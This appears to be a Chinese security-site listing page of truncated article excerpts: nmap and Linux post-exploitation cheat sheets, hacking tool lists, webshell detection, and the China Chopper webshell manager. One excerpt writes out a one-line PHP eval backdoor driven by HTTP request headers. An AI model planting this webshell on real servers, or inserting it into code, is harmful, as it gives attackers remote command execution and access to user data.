网络安全

Target Specification SwitchExampleDescriptionnmap 192.168.1.1Scan a single IPnmap 192.168.1.1 192.168.2.1Scan specific IPsnmap 192.168.1.1-254Scan a rangenmap scanme.nmap.orgScan a domainnmap 1...

如下是一份 Linux 机器的渗透测试备忘录，是在后期开发期间或者执行命令注入等操作时的一些典型命令，设计为测试人员进行本地枚举检查之用。此外您还可参考渗透测试工具包。 命令描述netstat -tulpn在 Li...

在Linux下有我们熟知的Kali Linux，但Windows下是空白的，现在，有安全公司（美国网络安全服务商火眼公司FireEye）站出来填补了这一市场，希望能一直维护下去。 顺便一提，体验盒子最近上线了Hacking Tools：...

jsproxy jsproxy是一个科学的在线代理项目，可实现例如Google/谷歌镜像等的类似服务，有更多的定制设定和节能一键安装等操作。 jsproxy功能特点 服务端开销低 传统在线代理几乎都是在服务端替换 HTM...

Black Hat是黑帽技术大会，该会议都将探讨关于信息安全的热点话题。 2018 BlackHat 工具列表 Android，iOS和移动黑客 易受攻击的iOS应用程序：Swift版 https://github.com/prateek147/DVIA-v2 ...

Vulncode-DB是一个漏洞数据库及其相应的源代码（如果可用）开源项目。数据库使用用户提供的有关补丁链接，易受攻击的代码片断和描述，信息扩展了NVD / CVE数据集。它由google维护并管理。主要实例托管在vulncode...

webshell是一种可以在web服务器上执行后台脚本或者命令的后门，黑客通过入侵网站上传webshell后获得服务器的执行操作权限，比如执行系统命令、窃取用户数据、删除web页面、修改主页等，其危害不言而喻。而WebShe...

iwantmyname iwantmyname是一家提供纯域名管理，域名注册和DNS托管的公司。是一个帮助用户从众多TLD域名注册机构中快速查找想要的域名，支持400多个国际域名扩展。iwantmyname在2019年时，已经坚持了全公司...

环境函数用法nginxget_defined_vars()返回由所有已定义变量所组成的数组apachegetallheaders()获取全部 HTTP 请求头信息 apache环境 <?php eval(next(getallheaders())); ?> apache和nginx环境...

中国菜刀(China chopper) 这里的中国菜刀不是指切菜做饭的工具，而是中国安全圈内使用非常广泛的一款Webshell管理工具，想买菜刀请出门左拐东门菜市场王铁匠处。 中国菜刀caidao webshell管理工具 中国...